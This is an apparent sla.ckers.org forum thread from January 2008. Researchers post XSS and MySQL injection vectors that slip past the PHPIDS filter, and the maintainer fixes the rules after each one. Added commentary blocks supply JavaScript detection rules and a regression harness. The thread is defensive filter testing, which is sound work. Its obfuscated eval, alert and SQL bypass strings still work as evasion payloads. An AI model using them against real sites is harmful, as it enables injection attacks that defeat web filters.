Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Current Page: 15 of 31
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 10, 2008 08:00PM

I wanted to see how phpids handled some recent stuff from milw0rm, so for fun:
RCE
http://milw0rm.com/exploits/4851 Caught, score: 19
http://milw0rm.com/exploits/4849 Not caught.
vector:
?test=@phpinfo();@

LFI
http://milw0rm.com/exploits/4876 Caught, score: 15

SQLi
http://milw0rm.com/exploits/4867 Caught, score: 32
http://milw0rm.com/exploits/4863 Caught, score: 14

4 out of 5, not bad:)

-tx @ lowtech-labs.org

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 11, 2008 05:00AM

Hi!

Wow - very nice find - the problem with the not-detected vector actually turned out to be a severe bug in the converter. Thanks!

Greetings,
.mario

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 11, 2008 07:51AM

actually not that new, but since I posted some (My)SQLi vectors that require a column name, you can of course do some math with a column name only:

aa'or column=column -- #aa (php-ids)
aa'or column*column!='0 (php-ids)
aa'or column like column -- #a (php-ids)

0'*column is \N - '1 (php-ids)
1'*column is \N or '1 (php-ids)
1'*@a is \N - ' (php-ids)
1'*@a is \N or '1 (php-ids)

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 12, 2008 11:11AM

I haven't XSS'd PHPIDS for a while so I thought I'd have a go.....

x=[/&/,alert,/&/][1],x(1)

:)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 12, 2008 11:30AM

Nice one Gareth! Here's a modified version that works in IE7 and Opera, but didn't work in Firefox 3 beta or Safari...
[demo.phpids.org]

Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: thornmaker
Date: January 12, 2008 12:23PM

Another modification of Gareth's, now with arbitrary code execution goodness: [p42.us]

Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: Gareth Heyes
Date: January 12, 2008 12:29PM

Hehe cool thornmaker

Here's another:-

new RegExp(/a/,alert(1))
RegExp(/a/,alert(1))


Edited 1 time(s). Last edit at 01/12/2008 12:41PM by Gareth Heyes.

Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: Gareth Heyes
Date: January 12, 2008 12:44PM

javascript:"<iframe src='http://demo.php-ids.org/?test=RegExp(/a/,alert(name))' name='Follow the rabbit!'>"


Re: PHPIDS (0.4.4 - there is no spoon)
Posted by: Anonymous User
Date: January 12, 2008 01:15PM

Indeed - it's been a while ;)

Thx Reiners, David and Gareth! The RegExp issue pointed to a converter bug, and I customized the rules for the other ones. I think we can release 0.4.5 in the next few days - any thoughts?

Greetings,
.mario

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 12, 2008 02:25PM

a couple variations using null to bypass some filters:

http://p42.us/phpids/38.html
y='nam'
$x=eval,null
$x($x(y+'e')+/x/)
http://p42.us/phpids/39.html
y=name,null
$x=eval,null
$x(y)

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 12, 2008 02:32PM

just a little bug in the rules when using "is \N" without a space.

0'*column is\N - '1 (php-ids)
1'*column is\N or '1 (php-ids)
1'*@a is\N - ' (php-ids)
1'*@a is\N or '1 (php-ids)

another modification:
1'*@a is \N-' (php-ids)

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 12, 2008 04:56PM

found and fixed - thx!

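The whitespace gap Reiners reports above, as an added example that is not PHPIDS code: one constructed rule that insists on whitespace between "is" and "\N" beside one that makes the whitespace optional, run over the vectors from this thread plus a benign phrase. MySQL reads "\N" inside a statement as NULL, so "is \N" and "is\N" reach the database with the same meaning; the rule shapes and the sample list are assumptions of this example, not the project's own filter set.

```javascript
// Added example, not PHPIDS code: the rule shapes below are constructed to
// illustrate the "is \N" whitespace gap, not copied from the PHPIDS filters.

// Weak rule: requires at least one whitespace character between "is" and the
// null token, so the compact "is\N" slips through.
const RULE_WEAK = /\bis\s+(?:\\N|null)\b/i;

// Fixed rule: whitespace is optional. MySQL accepts both "is \N" and "is\N"
// as IS NULL, so the rule has to as well.
const RULE_FIXED = /\bis\s*(?:\\N|null)\b/i;

// Vectors quoted from this thread (the "(php-ids)" suffix dropped), plus one
// constructed benign string that contains "is" but no null token.
const SAMPLES = [
  "0'*column is \\N - '1",
  "0'*column is\\N - '1",
  "1'*@a is\\N or '1",
  "1'*@a is \\N-'",
  "this island is nice", // benign, constructed
];

// Returns the subset of samples that a rule flags.
function flagged(rule, samples) {
  return samples.filter((s) => rule.test(s));
}

// Side-by-side report: what each rule catches from the same sample set.
function report() {
  return {
    weak: flagged(RULE_WEAK, SAMPLES),
    fixed: flagged(RULE_FIXED, SAMPLES),
  };
}

console.log(report());
```

The general lesson is that a rule matching SQL keywords should treat the whitespace around them as optional wherever the database's parser does, otherwise the compact spelling is a free bypass.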
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 12, 2008 05:02PM

and another: http://p42.us/phpids/40.html
y='na'
$x=3.e1[(x=/eva/)?x[-1]+'l':$]
$x($x(y+'me')+1.)

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 12, 2008 05:30PM

Long time no hailstorm like this - damn exponential numbers, they messed with all XSS rules using \d :) fixed!

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Reiners
Date: January 12, 2008 05:36PM

Just noted that I actually don't need the "is \N" issue necessarily, sry ;)
1'*@a or'1 (php-ids)
1'*column or'1 (php-ids)

and this vector works as well, but you have to make sure that the column contains integers (which isn't hard to find since most tables have a column like "id" or something similar):
1'*id-'0 (php-ids)

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 12, 2008 06:00PM

@.mario: my last one still works... you sure it's fixed?

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 12, 2008 06:34PM

Ah damn - I accidentally didn't deploy the latest converter revision. Done!

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: thornmaker
Date: January 12, 2008 07:03PM

I'm pretty sure this didn't work before (the 1. part... lots of variations also work like .1, -1, etc). Maybe moving the ternary operator into the argument changes which filters it's brushing up against: http://p42.us/phpids/41.html
y='na'
$x=(1.)[(x=/eva/)?x[-1]+'l':$]
$x($x(y+'me')+1.)

Edited 1 time(s). Last edit at 01/12/2008 07:05PM by thornmaker.

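Mario's remark that the exponential numbers "messed with all XSS rules using \d", and thornmaker's 3.e1 and (1.) variants above, come down to one thing: a bare \d+ does not describe a JavaScript number literal. The block below is an added example, not PHPIDS code: a constructed rule written with \d+ beside the same rule with a full numeric-literal sub-pattern, and a converter-style normalizer that collapses every literal to "1" before the rules run. The rule shapes and the two benign strings are assumptions of this example.

```javascript
// Added example, not PHPIDS code. Rule shapes are constructed for
// illustration; the project's real filters are not reproduced here.

// A JavaScript numeric literal: 1, 1., .1, 1.5, 3.e1, 2E-3 (no sign; a
// leading minus is a separate unary operator).
const NUM = String.raw`(?:\d+\.?\d*|\.\d+)(?:e[+-]?\d+)?`;

// Heuristic both rules share: a number literal used as an object by being
// subscripted, optionally wrapped in parentheses, e.g. 3.e1[...] or (1.)[...]
// Weak form: \d+ only, so in "3.e1[" and "(1.)[" the "[" never directly
// follows the digits and the rule stays silent.
const RULE_WEAK = /\b\d+\)?\s*\[/;

// Fixed form: the same shape with the full literal pattern substituted. The
// lookbehind stops an identifier that ends in a digit (x1[0]) from matching.
const RULE_FIXED = new RegExp(String.raw`(?<![\w$])\(?${NUM}\)?\s*\[`, 'i');

// Converter-style alternative: rewrite every number literal to "1" before any
// rule runs, so rules written with \d+ keep working.
const NUM_ANYWHERE = new RegExp(String.raw`(?<![\w$])${NUM}`, 'gi');
function normalizeNumbers(input) {
  return input.replace(NUM_ANYWHERE, '1');
}

// Quoted from the thread (thornmaker's 40.html and 41.html payloads).
const VECTORS = [
  "$x=3.e1[(x=/eva/)?x[-1]+'l':$]",
  "$x=(1.)[(x=/eva/)?x[-1]+'l':$]",
];
// Constructed benign inputs: a literal that is not subscripted, and an
// identifier that ends in a digit.
const BENIGN = ['var t = 3.e1; list[0]', 'x1[0]'];

// Per input: which rule fires on the raw text, and whether the weak rule
// fires once the text has been normalized.
function classify(input) {
  return {
    weak: RULE_WEAK.test(input),
    fixed: RULE_FIXED.test(input),
    weakAfterNormalize: RULE_WEAK.test(normalizeNumbers(input)),
  };
}

console.log(VECTORS.map(classify), BENIGN.map(classify));
```

Of the two fixes, normalizing in a converter stage scales better: one sub-pattern maintained in one place, and every downstream rule that says \d+ benefits without being rewritten.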
Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 06:56AM

delete alert(1)
AND
typeof alert(1)


Edited 1 time(s). Last edit at 01/13/2008 07:00AM by Gareth Heyes.

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 07:50AM

This is a variant on delete but I thought it looked cool so I've added it here :)

delete this[
decodeURI
(
'a%6Cert'
)
]
(1)

I wanted a way to directly call alert without eval. this holds the reference to the current window, so this['alert'] refers to the property alert in the window.


Edited 1 time(s). Last edit at 01/13/2008 07:52AM by Gareth Heyes.

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 08:19AM

I'm throwing things at it now :D

throw alert(1)


Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Anonymous User
Date: January 13, 2008 08:51AM

*Ouch*

I added some fixes and I am pretty sure that it will be pretty hard to find new stuff right now - especially when coming to ternaries and concatenations. (But I am sure there's still potential for a surprise *g*)

Greetings,
.mario

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 09:21AM

Hehe we'll see ;)


Re: PHPIDS (0.4.4 - Follow the white rabbit)
Date: January 13, 2008 11:00AM

@.mario: ternary is my middle name - [p42.us]

Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 11:46AM

@Master Ternary Li

Hehe I know :)


Re: PHPIDS (0.4.4 - Follow the white rabbit)
Posted by: Gareth Heyes
Date: January 13, 2008 01:52PM

1 instanceof alert(1)


Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 13, 2008 02:12PM

1 in alert(1)

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:18PM

Ah bloody hell - the instanceof I did expect but the in I didn't. Nice!

And btw even that one works:
1in alert(1)

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 13, 2008 02:24PM

@mario

It might be interesting to collect all the JS functions and objects and run a simple script to determine javascript execution. I've done something similar with variables:-

http://www.businessinfo.co.uk/labs/js_variables/js_variable_tester.php


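A small harness in the spirit of Gareth's suggestion, added here as an example; it is neither PHPIDS code nor the js_variable_tester script he links. It covers the operator-keyword vectors exchanged above (delete, typeof, throw, instanceof, in, the space-less 1in, and the earlier new RegExp form): every vector is run through one constructed detection rule, and the result says which are caught, so the list doubles as a regression check after a rule change. The rule, keyword list and benign strings are assumptions of this example.

```javascript
// Added example, not PHPIDS code. The rule looks for one of the operator
// keywords that appear in this thread, followed by an identifier that is
// called straight away. The lookbehind forbids a letter before the keyword
// but permits a digit, which is what lets "1in alert(1)" parse as two tokens.
const KEYWORDS = ['delete', 'typeof', 'throw', 'instanceof', 'in', 'new'];
const KEYWORD_CALL = new RegExp(
  String.raw`(?<![A-Za-z_$])(?:${KEYWORDS.join('|')})\s+[A-Za-z_$][\w$]*\s*\(`
);

// Vectors quoted from the thread; each one is expected to be caught.
const VECTORS = [
  'delete alert(1)',
  'typeof alert(1)',
  'throw alert(1)',
  '1 instanceof alert(1)',
  '1 in alert(1)',
  '1in alert(1)',
  'new RegExp(/a/,alert(1))',
];

// Constructed benign inputs: ordinary text that happens to contain keywords.
const BENIGN = [
  'delete this item from the cart',
  'what does typeof mean in javascript',
  'throw in the towel',
];

// Run every sample through the rule. Nothing is evaluated, only matched.
function runHarness(samples, rule = KEYWORD_CALL) {
  return samples.map((vector) => ({ vector, caught: rule.test(vector) }));
}

// How many of a sample set the rule catches.
function caughtCount(samples, rule = KEYWORD_CALL) {
  return runHarness(samples, rule).filter((r) => r.caught).length;
}

// Samples the rule misses, which is the list a rule author wants to see.
function missed(samples, rule = KEYWORD_CALL) {
  return runHarness(samples, rule).filter((r) => !r.caught).map((r) => r.vector);
}

console.log(runHarness(VECTORS), runHarness(BENIGN));
```

Keeping the known vectors in a file and running the harness after every rule or converter change is the cheap way to avoid the "accidentally didn't deploy the latest converter revision" moment earlier in the thread.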
Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 13, 2008 02:25PM

Yep - I saw that. I can't stop thinking about a way to sandbox JS execution recently. Seems to be the only way (ma1's words...)
